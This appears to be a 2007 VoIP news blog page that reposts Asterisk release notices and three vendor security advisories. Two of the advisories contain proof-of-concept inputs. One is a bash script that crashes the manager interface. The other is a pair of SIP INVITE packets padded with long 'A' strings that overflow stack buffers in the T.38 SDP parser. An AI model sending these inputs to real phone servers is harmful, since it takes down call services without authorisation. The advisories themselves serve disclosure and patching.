[asterisk-announce] Asterisk-addons 1.2.6 Released

April 25, 2007

The Asterisk.org development team has released Asterisk-addons version
1.2.6.

This release contains a large number of fixes, including:

- Fix some memory leaks in res_config_mysql
- Fix various issues in the OOH323 channel driver

A full list of changes is available in the ChangeLog.

Thank you for your support of Asterisk.org!

Written by Voip Phreak · Filed Under News

[asterisk-announce] Asterisk 1.4.3 Released

April 25, 2007

The Asterisk.org development team has released Asterisk version 1.4.3.

This release contains a large number of fixes, including:

- A recently published security vulnerability in the manager interface
(ASA-2007-012)
- Two recently published security vulnerabilities in the SIP channel
driver
(ASA-2007-010 and ASA-2007-011)

A full list of changes is available in the ChangeLog.

Thank you for your support of Asterisk.org!

Written by Voip Phreak · Filed Under News

[asterisk-announce] Asterisk 1.2.18 Released

April 25, 2007

The Asterisk.org development team has released Asterisk version 1.2.18.

This release contains a large number of fixes, including:

- A recently published security vulnerability in the manager interface
(ASA-2007-012)
- Another recently published security vulnerability in the SIP channel
driver
(ASA-2007-011)

A full list of changes is available in the ChangeLog.

Thank you for your support of Asterisk.org!

Written by Voip Phreak · Filed Under News

[asterisk-announce] ASA-2007-012: Remote Crash Vulnerability in Manager Interface

April 24, 2007

> Asterisk Project Security Advisory - ASA-2007-012
>
> +------------------------------------------------------------------------+
> | Product | Asterisk |
> |---------------------+--------------------------------------------------|
> | Summary | Remote Crash Vulnerability in Manager Interface |
> |---------------------+--------------------------------------------------|
> | Nature of Advisory | Denial of Service |
> |---------------------+--------------------------------------------------|
> | Susceptibility | Remote Unauthenticated Sessions |
> |---------------------+--------------------------------------------------|
> | Severity | Moderate |
> |---------------------+--------------------------------------------------|
> | Exploits Known | Yes |
> |---------------------+--------------------------------------------------|
> | Reported On | April 24, 2007 |
> |---------------------+--------------------------------------------------|
> | Reported By | Digium Technical Support |
> |---------------------+--------------------------------------------------|
> | Posted On | April 24, 2007 |
> |---------------------+--------------------------------------------------|
> | Last Updated On | April 24, 2007 |
> |---------------------+--------------------------------------------------|
> | Advisory Contact | russell@digium.com |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Description | The Asterisk Manager Interface has a remote crash |
> | | vulnerability. If a manager user is configured in |
> | | manager.conf without a password, and then a connection |
> | | is made that attempts to use that username and MD5 |
> | | authentication, Asterisk will dereference a NULL pointer |
> | | and crash. |
> | | |
> | | This example script shows how the crash can be |
> | | triggered: |
> | | |
> | | #!/bin/bash |
> | | |
> | | function text1() { |
> | | |
> | | cat <<- EOF |
> | | |
> | | action: Challenge |
> | | |
> | | actionid: 0# |
> | | |
> | | authtype: MD5 |
> | | |
> | | EOF |
> | | |
> | | } |
> | | |
> | | function text2() { |
> | | |
> | | cat <<- EOF |
> | | |
> | | action: Login |
> | | |
> | | actionid: 1# |
> | | |
> | | key: textstringhere |
> | | |
> | | username: testuser |
> | | |
> | | authtype: MD5 |
> | | |
> | | EOF |
> | | |
> | | } |
> | | |
> | | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1 |
> | | 5038 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | The manager interface is not enabled by default. If it is |
> | | enabled, the only way this crash can be exploited is if a |
> | | user exists in manager.conf without a password. Given the |
> | | conditions necessary for this problem to be exploited, |
> | | the severity of this issue is marked as 'moderate'. |
> | | |
> | | All users of the Asterisk manager interface in affected |
> | | versions should ensure that there are no accounts in |
> | | manager.conf. Alternatively, the issue can be avoided by |
> | | completely disabling the manager interface. |
> | | |
> | | Users of the manager interface are encouraged to update |
> | | to the appropriate version of their Asterisk product |
> | | listed in the 'Corrected In' section below. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions |
> |------------------------------------------------------------------------|
> | Product | Release | |
> | | Series | |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.0.x | All versions |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.2.x | All versions prior to |
> | | | 1.2.18 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.4.x | All versions prior to |
> | | | 1.4.3 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | A.x.x | All versions |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | B.x.x | All versions up to and |
> | | | including B.1.3 |
> |------------------------------+-------------+---------------------------|
> | AsteriskNOW | pre-release | All version up to and |
> | | | including Beta5 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Appliance Developer | 0.x.x | All versions prior to |
> | Kit | | 0.4.0 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In |
> |------------------------------------------------------------------------|
> | Product | Release |
> |-------------------+----------------------------------------------------|
> | Asterisk Open | 1.2.18 and 1.4.3, available from |
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk |
> |-------------------+----------------------------------------------------|
> | Asterisk Business | B.1.3.3, available from the Asterisk Business |
> | Edition | Edition user portal on http://www.digium.com or |
> | | via Digium Technical Support |
> |-------------------+----------------------------------------------------|
> | AsteriskNOW | Beta6, when available from |
> | | http://www.asterisknow.org/. Beta5 can use the |
> | | system update feature in the appliance control |
> | | panel. |
> |-------------------+----------------------------------------------------|
> | Asterisk | 0.4.0, available from |
> | Appliance | ftp://ftp.digium.com/pub/telephony/aadk/ |
> | Developer Kit | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at |
> | http://www.asterisk.org/security. |
> | |
> | This document may be superseded by later versions; if so, the latest |
> | version will be posted at |
> | http://www.asterisk.org/files/ASA-2007-012.pdf. |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-012
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.

Written by Voip Phreak · Filed Under Security

[asterisk-announce] ASA-2007-011: Multiple problems in SIP channel parser handling response codes

April 24, 2007

> Asterisk Project Security Advisory - ASA-2007-011
>
> +------------------------------------------------------------------------+
> | Product | Asterisk |
> |--------------------+---------------------------------------------------|
> | Summary | Multiple problems in SIP channel parser handling |
> | | response codes |
> |--------------------+---------------------------------------------------|
> | Nature of Advisory | Denial of Service |
> |--------------------+---------------------------------------------------|
> | Susceptibility | Remote Unauthenticated Sessions |
> |--------------------+---------------------------------------------------|
> | Severity | Critical |
> |--------------------+---------------------------------------------------|
> | Exploits Known | No |
> |--------------------+---------------------------------------------------|
> | Reported On | March 20, 2007 |
> |--------------------+---------------------------------------------------|
> | Reported By | Mantis user ID 'qwerty1979' |
> |--------------------+---------------------------------------------------|
> | Posted On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Last Updated On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Advisory Contact | kpfleming@digium.com |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Description | Multiple problems have been identified in the Asterisk |
> | | SIP channel driver (chan_sip) when handling response |
> | | packets from other SIP endpoints. |
> | | |
> | | If the response packets did not contain a valid response |
> | | code in the first line of the UDP packet, the Asterisk |
> | | SIP channel driver would fail to parse the packet |
> | | properly and would cause the Asterisk process to die |
> | | with a segmentation fault. This results in all active |
> | | calls and other sessions being lost. |
> | | |
> | | More details about these issues can be found at |
> | | http://bugs.digium.com/view.php?id=9313. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | All users are urged to upgrade to the appropriate version |
> | | of their Asterisk product listed in the 'Corrected In' |
> | | section below. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions |
> |------------------------------------------------------------------------|
> | Product | Release | |
> | | Series | |
> |---------------------------+-------------+------------------------------|
> | Asterisk Open Source | 1.0.x | has not been evaluated as |
> | | | this release series is no |
> | | | longer maintained |
> |---------------------------+-------------+------------------------------|
> | Asterisk Open Source | 1.2.x | all releases prior to 1.2.18 |
> |---------------------------+-------------+------------------------------|
> | Asterisk Open Source | 1.4.x | all releases prior to 1.4.3 |
> |---------------------------+-------------+------------------------------|
> | Asterisk Business Edition | A.x.x | all releases |
> |---------------------------+-------------+------------------------------|
> | Asterisk Business Edition | B.x.x | all releases prior to and |
> | | | including B.1.3.2 |
> |---------------------------+-------------+------------------------------|
> | AsteriskNOW | pre-release | all releases prior to and |
> | | | including Beta 5 |
> |---------------------------+-------------+------------------------------|
> | Asterisk Appliance | 0.x.x | all releases prior to 0.4.0 |
> | Developer Kit | | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In |
> |------------------------------------------------------------------------|
> | Product | Release |
> |--------------------+---------------------------------------------------|
> | Asterisk Open | 1.2.18 and 1.4.3, available from |
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk |
> |--------------------+---------------------------------------------------|
> | Asterisk Business | B.1.3.3, available from the Asterisk Business |
> | Edition | Edition user portal on http://www.digium.com or |
> | | via Digium Technical Support |
> |--------------------+---------------------------------------------------|
> | AsteriskNOW | Beta 6, when available from |
> | | http://www.asterisknow.org, Beta 5 users can use |
> | | use 'System Update' in the appliance control |
> | | panel to update their version of AsteriskNOW |
> |--------------------+---------------------------------------------------|
> | Asterisk Appliance | 0.4.0, available from |
> | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links | http://bugs.digium.com/view.php?id=9313 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at |
> | http://www.asterisk.org/security. |
> | |
> | This document may be superseded by later versions; if so, the latest |
> | version will be posted at |
> | http://www.asterisk.org/files/ASA-2007-011.pdf. |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-011
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.

Written by Voip Phreak · Filed Under Security

[asterisk-announce] ASA-2007-010: Two stack buffer overflows in SIP channel’s T.38 SDP parsing code

April 24, 2007

> Asterisk Project Security Advisory - ASA-2007-010
>
> +------------------------------------------------------------------------+
> | Product | Asterisk |
> |--------------------+---------------------------------------------------|
> | Summary | Two stack buffer overflows in SIP channel's T.38 |
> | | SDP parsing code |
> |--------------------+---------------------------------------------------|
> | Nature of Advisory | Exploitable Stack Buffer Overflow |
> |--------------------+---------------------------------------------------|
> | Susceptibility | Remote Unauthenticated Sessions |
> |--------------------+---------------------------------------------------|
> | Severity | Moderate |
> |--------------------+---------------------------------------------------|
> | Exploits Known | No |
> |--------------------+---------------------------------------------------|
> | Reported On | March 22, 2007 |
> |--------------------+---------------------------------------------------|
> | Reported By | Barrie Dempster, NGS Software, |
> | | |
> |--------------------+---------------------------------------------------|
> | Posted On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Last Updated On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Advisory Contact | kpfleming@digium.com |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the SIP/SDP |
> | |handler of Asterisk, the vulnerabilities are very similar but exist as |
> | |two separate unsafe function calls. The T38FaxRateManagement and |
> | |T38FaxUdpEC SDP parameters can be exploited remotely leading to |
> | |arbitrary code execution without authentication. In order for these |
> | |overflows to occur, t38 fax over SIP must be enabled in sip.conf. |
> | |Examples of SIP INVITE packets are shown below, however these |
> | |vulnerabilities can be triggered with a number of different SIP messages|
> | |affecting calls received by Asterisk, or in response to calls made by |
> | |Asterisk. |
> | | |
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP |
> | |T38FaxRateManagement parameter |
> | | |
> | |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> | |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> | |long T38 parameter it is possible to overflow a stack based buffer and |
> | |execute arbitrary code. |
> | | |
> | |The process_sdp function of chan_sip.c in Asterisk contains the |
> | |following vulnerable call to sscanf. |
> | | |
> | |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { |
> | | |
> | |found = 1; |
> | | |
> | |if (option_debug > 2) |
> | | |
> | |ast_log(LOG_DEBUG, "RateMangement: %s\n", s); |
> | | |
> | |if (!strcasecmp(s, "localTCF")) |
> | | |
> | |peert38capability |= |
> | | |
> | |T38FAX_RATE_MANAGEMENT_LOCAL_TCF; |
> | | |
> | |else if (!strcasecmp(s, "transferredTCF")) |
> | | |
> | |peert38capability |= |
> | | |
> | |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF; |
> | | |
> | |This attempts to read the "T38FaxRateManagement:" option from the SDP |
> | |within a SIP packet and copy the succeeding string into "s". There are |
> | |no checks on the length of this string and we can therefore write past |
> | |the boundaries of the "s" variable overwriting adjacent memory on the |
> | |stack. "s" is defined earlier in this function as being a character |
> | |array of only 256 bytes. The following example packet demonstrates an |
> | |overflow of this parameter: |
> | | |
> | |INVITE sip:200@127.0.0.1 SIP/2.0 |
> | | |
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT |
> | | |
> | |CSeq: 1 INVITE |
> | | |
> | |Via: SIP/2.0/UDP |
> | | |
> | |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> | | |
> | |User-Agent: NGS/2.0 |
> | | |
> | |From: "Barrie Dempster" |
> | | |
> | |;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | | |
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
> | | |
> | |To: |
> | | |
> | |Contact: |
> | | |
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
> | | |
> | |Content-Type: application/sdp |
> | | |
> | |Content-Length: 796 |
> | | |
> | |Max-Forwards: 70 |
> | | |
> | |v=0 |
> | | |
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
> | | |
> | |s=- |
> | | |
> | |c=IN IP4 127.0.0.1 |
> | | |
> | |t=0 0 |
> | | |
> | |m=image 5004 UDPTL t38 |
> | | |
> | |a=T38FaxVersion:0 |
> | | |
> | |a=T38MaxBitRate:14400 |
> | | |
> | |a=T38FaxMaxBuffer:1024 |
> | | |
> | |a=T38FaxMaxDatagram:238 |
> | | |
> | |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAA |
> | | |
> | |a=T38FaxUdpEC:t38UDPRedundancy |
> | | |
> | |------------------------------------------------- |
> | | |
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC |
> | |parameter |
> | | |
> | |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> | |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> | |long T38FaxUdpEC parameter it is possible to overflow a stack based |
> | |buffer and execute arbitrary code. |
> | | |
> | |The process_sdp function of chan_sip.c in Asterisk contains the |
> | |following vulnerable call to sscanf. |
> | | |
> | |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) { |
> | | |
> | |found = 1; |
> | | |
> | |if (option_debug > 2) |
> | | |
> | |ast_log(LOG_DEBUG, "UDP EC: %s\n", s); |
> | | |
> | |if (!strcasecmp(s, "t38UDPRedundancy")) { |
> | | |
> | |peert38capability |= |
> | | |
> | |T38FAX_UDP_EC_REDUNDANCY; |
> | | |
> | |ast_udptl_set_error_correction_scheme(p->udptl, |
> | | |
> | |UDPTL_ERROR_CORRECTION_REDUNDANCY); |
> | | |
> | |This attempts to read the "T38FaxUdpEC:" option from the SDP within a |
> | |SIP packet and copy the succeeding string into "s". There are no checks |
> | |on the length of this string and we can therefore write past the |
> | |boundaries of the "s" variable overwriting adjacent memory on the stack.|
> | |"s" is defined earlier in this function as being a character array of |
> | |only 256 bytes. The following example packet demonstrates an overflow of|
> | |this parameter: |
> | | |
> | |INVITE sip:200@127.0.0.1 SIP/2.0 |
> | | |
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT |
> | | |
> | |CSeq: 1 INVITE |
> | | |
> | |Via: SIP/2.0/UDP |
> | | |
> | |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> | | |
> | |User-Agent: NGS/2.0 |
> | | |
> | |From: "Barrie Dempster" |
> | | |
> | |;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | | |
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
> | | |
> | |To: |
> | | |
> | |Contact: |
> | | |
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
> | | |
> | |Content-Type: application/sdp |
> | | |
> | |Content-Length: 796 |
> | | |
> | |Max-Forwards: 70 |
> | | |
> | |v=0 |
> | | |
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
> | | |
> | |s=- |
> | | |
> | |c=IN IP4 127.0.0.1 |
> | | |
> | |t=0 0 |
> | | |
> | |m=image 5004 UDPTL t38 |
> | | |
> | |a=T38FaxVersion:0 |
> | | |
> | |a=T38MaxBitRate:14400 |
> | | |
> | |a=T38FaxMaxBuffer:1024 |
> | | |
> | |a=T38FaxMaxDatagram:238 |
> | | |
> | |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | | |
> | |AAAAAAAAA |
> +------------------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | T.38 support in the affected versions of Asterisk is not |
> | | enabled by default, therefore the severity of this issue |
> | | is 'moderate'. |
> | | |
> | | Users who are using the default configuration with |
> | | 't38_udptl' set to 'no' or an equivalent value are not |
> | | susceptible to this vulnerability. Users who have set |
> | | this configuration item to 'yes' or an equivalent value |
> | | but are not actually using T.38 support can set it to |
> | | 'no' to secure their systems against this vulnerability. |
> | | |
> | | All other users are urged to upgrade to the appropriate |
> | | version of their Asterisk product listed in the |
> | | 'Corrected In' section below. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions |
> |------------------------------------------------------------------------|
> | Product | Release | |
> | | Series | |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.0.x | not affected; does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.2.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.4.x | all releases prior to |
> | | | 1.4.3 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | A.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | B.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | AsteriskNOW | pre-release | all releases prior to and |
> | | | including Beta 5 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Appliance Developer | 0.x.x | all releases prior to |
> | Kit | | 0.4.0 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In |
> |------------------------------------------------------------------------|
> | Product | Release |
> |--------------------+---------------------------------------------------|
> | Asterisk Open | 1.4.3, available from |
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk |
> |--------------------+---------------------------------------------------|
> | AsteriskNOW | Beta 6, when available from |
> | | http://www.asterisknow.org, Beta 5 users can use |
> | | use 'System Update' in the appliance control |
> | | panel to update their version of AsteriskNOW |
> |--------------------+---------------------------------------------------|
> | Asterisk Appliance | 0.4.0, available from |
> | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at |
> | http://www.asterisk.org/security. |
> | |
> | This document may be superseded by later versions; if so, the latest |
> | version will be posted at |
> | http://www.asterisk.org/files/ASA-2007-010.pdf. |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-010
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.

Written by Voip Phreak · Filed Under News, Security

[asterisk-users] AstLinux 0.4.5 released

April 24, 2007

Hello Everyone,

The AstLinux team is produce to announce the immediate availability
of AstLinux 0.4.5. This release took WAY too long and we are working
on ways to speed up the release cycle in the future.

As the latest release from the stable branch, 0.4.5 has updates and
fixes for several core software components. Please see the ChangeLog
on SourceForge for more information.

The AstLinux LiveCD, VmWare Image and binary images for the Soekris
net4801, PCEngines WRAP, generic i586, and VIA can be downloaded from
the AstLinux project page:

http://sourceforge.net/projects/astlinux/

As always, the AstLinux Development Environment is available from
the SourceForge SVN server.

I would like to send a special thank you to Darrick Hartman for
maintaining the 0.4 branch while I work on trunk - thanks again
Darrick!

Written by Voip Phreak · Filed Under News

« Previous Page — Next Page »

[asterisk-announce] Asterisk-addons 1.2.6 Released

[asterisk-announce] Asterisk 1.4.3 Released

[asterisk-announce] Asterisk 1.2.18 Released

[asterisk-announce] ASA-2007-012: Remote Crash Vulnerability in Manager Interface

[asterisk-announce] ASA-2007-011: Multiple problems in SIP channel parser handling response codes

[asterisk-announce] ASA-2007-010: Two stack buffer overflows in SIP channel’s T.38 SDP parsing code

[asterisk-users] AstLinux 0.4.5 released

Categories